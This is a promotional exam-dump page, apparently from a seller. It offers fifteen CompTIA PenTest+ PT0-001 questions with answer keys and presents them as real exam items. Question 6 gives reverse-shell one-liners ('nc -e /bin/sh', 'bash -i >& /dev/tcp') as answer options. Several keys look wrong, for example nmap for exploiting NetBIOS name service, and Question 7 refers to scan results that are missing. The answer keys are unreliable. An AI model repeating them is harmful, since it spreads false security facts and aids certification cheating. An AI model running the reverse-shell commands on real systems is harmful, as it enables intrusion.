Tens of thousands of competitors, pages of hard questions and unsatisfying exam preparation… Do not worry about all those annoying things! We help you with your CompTIA PenTest exam with the latest PT0-001 PDF dumps (Apr 07, 2022). We will assist you in clearing the PT0-001 exam with the newest CompTIA PenTest PT0-001 VCE free download. Our PT0-001 dumps are the most comprehensive ones.
Geekcert has its own expert team. They selected and published the latest PT0-001 preparation materials from the Official Exam-Center.
The following are the free PT0-001 dumps. Go through them and check the validity and accuracy of our PT0-001 dumps. Free sample questions from the PT0-001 free dumps are provided here. All the following questions are from the latest real PT0-001 dumps.
Question 1:
Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
Correct Answer: D
Reference: https://www.triaxiomsecurity.com/2018/08/16/physical-penetration-test-examples/
Question 2:
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
A. ICS vendors are slow to implement adequate security controls.
B. ICS staff are not adequately trained to perform basic duties.
C. There is a scarcity of replacement equipment for critical devices.
D. There is a lack of compliance for ICS facilities.
Correct Answer: B
Question 3:
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: A
Question 4:
Which of the following types of physical security attacks does a mantrap mitigate?
A. Lock picking
B. Impersonation
C. Shoulder surfing
D. Tailgating
Correct Answer: D
Question 5:
A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?
A. arpspoof
B. nmap
C. responder
D. burpsuite
Correct Answer: B
Reference: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/
Question 6:
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester most likely use?
A. perl -e ` use SOCKET'; $i='; $p='443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp// 443 0>&1
Correct Answer: D
Reference: https://hackernoon.com/reverse-shell-cf154dfee6bd
Question 7:
A penetration tester identifies the following findings during an external vulnerability scan:
Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
Correct Answer: D
Question 8:
After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?
A. The biometric device is tuned more toward false positives
B. The biometric device is configured more toward true negatives
C. The biometric device is set to fail closed
D. The biometric device duplicated a valid user's fingerprint.
Correct Answer: A
Question 9:
A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?
A. Use path modification to escape the application's framework.
B. Create a frame that overlays the application.
C. Inject a malicious iframe containing JavaScript.
D. Pass an iframe attribute that is malicious.
Correct Answer: C
Question 10:
A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?
A. Insider threat
B. Nation state
C. Script kiddie
D. Cybercrime organization
Correct Answer: A
Question 11:
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?
A. Advanced persistent threat
B. Script kiddie
C. Hacktivist
D. Organized crime
Correct Answer: B
Reference: https://www.sciencedirect.com/topics/computer-science/disgruntled-employee
Question 12:
Which of the following are MOST important when planning for an engagement? (Select TWO).
A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies
Correct Answer: AC
Question 13:
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
Correct Answer: D
Question 14:
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack
Correct Answer: B
References: https://geekflare.com/http-header-implementation/
Question 15:
A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles. For which of the following types of attack would this information be used?
A. Exploit chaining
B. Session hijacking
C. Dictionary
D. Karma
Correct Answer: C